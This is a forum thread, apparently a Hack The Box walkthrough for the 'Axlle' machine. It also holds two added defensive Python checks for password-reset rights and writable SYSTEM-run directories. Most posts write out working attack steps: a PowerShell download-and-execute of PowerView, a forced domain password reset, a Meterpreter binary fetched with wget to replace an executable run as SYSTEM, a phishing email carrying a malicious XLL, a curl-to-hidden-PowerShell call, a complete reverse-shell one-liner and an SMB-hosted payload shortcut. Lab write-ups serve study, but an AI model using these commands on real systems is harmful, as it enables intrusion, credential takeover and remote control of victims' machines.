Posts: 219
Threads: 14
Joined: Apr 2024
Jun 23, 2024, 11:02 PM
(This post was last modified: Jun 23, 2024, 11:54 PM by osamy7593.)
what for root guys ....
guys for root ===== after gaining shell as matrix
- Import PowerView
(New-Object System.Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1') | IEX
. .\PowerView.ps1
- Set New Password for Jacob.Greeny
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
- Evil-winrm
evil-winrm -i 10.10.1.21 -u Jacob.Greeny -p SuperSecuredPassword123!
- overwrite .exe
cd "C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64"
create a meterpreter standalonerunner.exe
wget http://10.10.x.x:8000/standalonerunner.exe -o standalonerunner.exe
set your meterpreter listener
wait for the admin to run standalonerunner.exe
after that get the root.txt
c:\Users\Administrator\Desktop>more root.txt
Posts: 5
Threads: 0
Joined: Jun 2024
Jun 24, 2024, 01:37 AM
(This post was last modified: Jun 24, 2024, 01:57 AM by r9967252.)
(Jun 23, 2024, 11:02 PM)osamy7593 Wrote: what for root guys ....
guys for root ===== after gaining shell as matrix
- Import PowerView
(New-Object System.Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1') | IEX
. .\PowerView.ps1
- Set New Password for Jacob.Greeny
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
- Evil-winrm
evil-winrm -i 10.10.1.21 -u Jacob.Greeny -p SuperSecuredPassword123!
- overwrite .exe
cd "C:\Program Files (x86)\Windows Kits\10\testing\standaloneTesting\internal\x64"
create a meterpreter standalonerunner.exe
wget http://10.10.x.x:8000/standalonerunner.exe -o standalonerunner.exe
set your meterpreter listener
wait for the admin to run standalonerunner.exe
after that get the root.txt
c:\Users\Administrator\Desktop>more root.txt
how did you figure out that d.matrix can set password of another identity?
(Jun 24, 2024, 01:37 AM)r9967252 Wrote: (Jun 23, 2024, 11:02 PM)osamy7593 Wrote: what for root guys ....
how did you figure out that d.matrix can set password of another identity?
nvm, found from sharphound, the group Web Dev can force change password on jacob
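A defender's way to surface the edge r9967252 found with SharpHound, as an added example that is not from the thread: it reads a users.json-shaped SharpHound export and lists every non-admin principal holding ForceChangePassword (or a right that implies it on a user object, GenericAll / AllExtendedRights) over a user. The JSON, SIDs and names below are constructed placeholders, and the SID-to-name map is assumed rather than taken from groups.json.

```python
import json

# Rights that let the holder reset a user's password outright (ForceChangePassword)
# or that imply it on a user object (GenericAll, AllExtendedRights).
RESET_RIGHTS = {"ForceChangePassword", "GenericAll", "AllExtendedRights"}
# RIDs of principals expected to hold such rights (512 Domain Admins, 519 Enterprise Admins).
EXPECTED_RIDS = {"512", "519"}

# Constructed sample in the shape of SharpHound's users.json (names and SIDs are placeholders).
SAMPLE_USERS_JSON = json.dumps({"data": [
    {"Properties": {"name": "JACOB.GREENY@AXLLE.HTB"},
     "Aces": [
         {"PrincipalSID": "S-1-5-21-1-2-3-512", "PrincipalType": "Group",
          "RightName": "GenericAll", "IsInherited": True},
         {"PrincipalSID": "S-1-5-21-1-2-3-1120", "PrincipalType": "Group",
          "RightName": "ForceChangePassword", "IsInherited": False}]},
    {"Properties": {"name": "D.MATRIX@AXLLE.HTB"}, "Aces": []}]})

# Constructed SID -> name map; SharpHound writes the group names in groups.json.
SID_NAMES = {"S-1-5-21-1-2-3-512": "DOMAIN ADMINS@AXLLE.HTB",
             "S-1-5-21-1-2-3-1120": "WEB DEV@AXLLE.HTB"}


def is_expected_principal(sid):
    """True for the built-in admin groups, identified by the trailing RID."""
    return sid.rsplit("-", 1)[-1] in EXPECTED_RIDS


def find_password_reset_edges(users_json, sid_names):
    """Return (principal, right, target) for every ACE that lets a non-admin
    principal reset a user's password."""
    edges = []
    for obj in json.loads(users_json)["data"]:
        target = obj["Properties"]["name"]
        for ace in obj.get("Aces", []):
            if ace["RightName"] in RESET_RIGHTS and not is_expected_principal(ace["PrincipalSID"]):
                principal = sid_names.get(ace["PrincipalSID"], ace["PrincipalSID"])
                edges.append((principal, ace["RightName"], target))
    return edges


if __name__ == "__main__":
    for principal, right, target in find_password_reset_edges(SAMPLE_USERS_JSON, SID_NAMES):
        print(f"{principal} has {right} over {target}")
```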
Posts: 12
Threads: 0
Joined: Jun 2024
(Jun 23, 2024, 03:54 PM)gihimlek Wrote: (Jun 23, 2024, 09:03 AM)anon912039120 Wrote: (Jun 23, 2024, 09:00 AM)jimmyshoemacher Wrote: (Jun 23, 2024, 04:12 AM)bmoon10 Wrote: (Jun 23, 2024, 04:04 AM)gihimlek Wrote: Same ....
couple of things:
1. swaks command that I've used and that worked:
swaks --to accounts@axlle.htb --from it@axlle.htb --header "Subject: ws" --body "check" --attach @ws.xll
2. PowerShell execution: made the rev shell work by adding this command to the xll example cpp file
system ("curl http://<IP>:<PORT>/revsh.ps1 | powershell -nop -W hidden -noni -ep bypass -f -");
revsh.ps1
$TCPClient = New-Object Net.Sockets.TCPClient('<IP>', <PORT>);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()
Replace <IP>,<PORT> with your IP, PORT
cheers
what did you use to make the xll file?
I tried using the HelloWorld and Octoberfest XLL_Phishing github repos to create the xll but I don't ever see any traffic on my http server
I used HelloWorld XLL (applied the necessary changes), modified xlAutoOpen to execute system("powershell -e ...") and that's it
What is the necessary change? I just inserted system("command") on the cpp and worked locally but not on the server
By changes I meant modifying project properties to compile using Excel 2013 SDK Libraries
Posts: 219
Threads: 14
Joined: Apr 2024
(Jun 24, 2024, 01:37 AM)r9967252 Wrote: (Jun 23, 2024, 11:02 PM)osamy7593 Wrote: what for root guys ....
how did you figure out that d.matrix can set password of another identity?
nvm, found from sharphound, the group Web Dev can force change password on jacob
yup
Posts: 9
Threads: 0
Joined: Jun 2024
(Jun 23, 2024, 12:50 PM)jimmyshoemacher Wrote: (Jun 23, 2024, 11:43 AM)bmoon10 Wrote: (Jun 23, 2024, 11:32 AM)jimmyshoemacher Wrote: anyone know how to use the hMailServer creds once you get the password?
1. hMailServer administrator encrypted pass is not crackable but the sqlserver pass is.
2. you can download the hMailserver.sdf and use the right tools + password to login into the database
3. dump the SHA256 password hashes of mail account holders from the table
4. try to crack the SHA256 hashes with john / hashcat.
it might be a dead end; nevertheless, exploring all the avenues is a good thing.
I tried using the sql creds everywhere but I don't gain access to anything, is it required to get the user flag? or is it all together just a dead end?
no, it's not required, it's just a rabbit hole
Posts: 5
Threads: 0
Joined: Jun 2024
Jun 24, 2024, 02:38 AM
(This post was last modified: Jun 24, 2024, 02:41 AM by r9967252.)
(Jun 24, 2024, 02:05 AM)osamy7593 Wrote: (Jun 24, 2024, 01:37 AM)r9967252 Wrote: (Jun 23, 2024, 11:02 PM)osamy7593 Wrote: what for root guys ....
how did you figure out that d.matrix can set password of another identity?
nvm, found from sharphound, the group Web Dev can force change password on jacob
yup
thanks, then, how did you find the admin is running the standalonerunner.exe? can't seem to find any schtasks or services
(Jun 24, 2024, 02:05 AM)osamy7593 Wrote: (Jun 24, 2024, 01:37 AM)r9967252 Wrote: (Jun 23, 2024, 11:02 PM)osamy7593 Wrote: what for root guys ....
how did you figure out that d.matrix can set password of another identity?
nvm, found from sharphound, the group Web Dev can force change password on jacob
yup
nvm again, found it "C:\app development\kbfiltr> type README.md"
Posts: 219
Threads: 14
Joined: Apr 2024
readme.md file tells that
Posts: 196
Threads: 31
Joined: Apr 2024
Jun 24, 2024, 03:54 AM
(This post was last modified: Jun 24, 2024, 03:56 AM by maggi.)
(Jun 24, 2024, 03:15 AM)osamy7593 Wrote: readme.md file tells that
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
what if that file was replaced or modified in some way to become evil?
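The condition maggi points at, a binary run as SYSTEM from a directory that ordinary users can write to, is what a defender would check before automating a test runner like this. As an added example that is not from the thread, this parses `icacls` output for such a directory and reports the low-privileged principals holding a write-capable right; the icacls output and the principal names below are constructed.

```python
import re

# Constructed icacls-style output for a directory like the one the README names:
# the path precedes the first ACE, then one principal:(flags)(rights) entry per line.
SAMPLE_ICACLS = r"""C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64 NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
  BUILTIN\Administrators:(I)(OI)(CI)(F)
  BUILTIN\Users:(OI)(CI)(M)
  AXLLE\d.matrix:(RX)
  Everyone:(DENY)(W)

Successfully processed 1 files; Failed processing 0 files"""

# Principals every low-privileged domain user effectively belongs to.
LOW_PRIV = {"BUILTIN\\Users", "Everyone", "NT AUTHORITY\\Authenticated Users"}
# icacls simple rights (F, M, W) and specific rights (WD write data, AD append data,
# DC delete child) that allow changing or replacing files in the directory.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC"}

ACE_RE = re.compile(
    r"(?P<principal>(?:NT AUTHORITY|NT SERVICE|BUILTIN|\S+)\\\S+|Everyone|CREATOR OWNER)"
    r":(?P<flags>(?:\([^)]*\))+)\s*$")


def parse_aces(icacls_output):
    """Yield (principal, set of flag/right tokens) for each ACE line of icacls output."""
    for line in icacls_output.splitlines():
        m = ACE_RE.search(line)
        if m:
            tokens = set()
            for group in re.findall(r"\(([^)]*)\)", m.group("flags")):
                tokens.update(t.strip() for t in group.split(","))
            yield m.group("principal"), tokens


def writable_by_low_priv(icacls_output, low_priv=LOW_PRIV):
    """Return the low-privileged principals granted a write-capable right on the path.
    DENY entries are skipped: they restrict rather than grant."""
    return sorted(p for p, tokens in parse_aces(icacls_output)
                  if p in low_priv and "DENY" not in tokens and tokens & WRITE_RIGHTS)


if __name__ == "__main__":
    for principal in writable_by_low_priv(SAMPLE_ICACLS):
        print(f"low-privileged principal can write here: {principal}")
```

Any principal it reports can replace what the scheduled SYSTEM task executes, which is exactly the overwrite the thread describes; the fix is to run the automation from a directory only administrators can write to.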
Posts: 8
Threads: 0
Joined: Jun 2024
(Jun 23, 2024, 10:11 PM)osamy7593 Wrote: guys what for user flag
(Jun 23, 2024, 05:55 PM)maggi Wrote: (Jun 23, 2024, 10:54 AM)game95 Wrote: (Jun 23, 2024, 07:11 AM)maggi Wrote: (Jun 23, 2024, 06:32 AM)ritualist Wrote: Didn't use those creds. But there is a hint in an email in the Data folder.
Something like this worked for me
$url = "file:////10.10.x.x/share/evil.exe"
$shortcutPath = "C:\inetpub\testing\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
Good looks I didn't think of that!
I knew it was a link but I always forget I can share a share
What is a payload of evil.exe could you share pls?
evil.exe is just a quickie placeholder name I use for msf payloads
windows/x64/meterpreter/reverse_tcp
bro this after gaining shell as whom?
wasn't working, the payload always got killed:
[*] Started reverse TCP handler on 10.10.16.20:1133
[*]Sending stage (175686 bytes) to 10.10.11.21
[*]10.10.11.21 - Meterpreter session 4 closed. Reason: Died
[-] Meterpreter session 4 is not valid and will be closed
Posts: 49
Threads: 1
Joined: Jun 2024
(Jun 23, 2024, 10:12 PM)Liy4 Wrote: I'm stuck on getting a rev shell. I use
swaks --to accounts@axlle.htb --from root@test.htb --body "Shell" --header "Subject: Help me Breach the System" --attach shell.xll --server axlle.htb
but didn't get the rev shell. What is the error??
Most likely the issue is with the shell.xll. Make sure to check that the xll works on your local machine before deploying it against the HTB machine. If it works in the local setup but not with HTB, then try changing the HTB VPN server.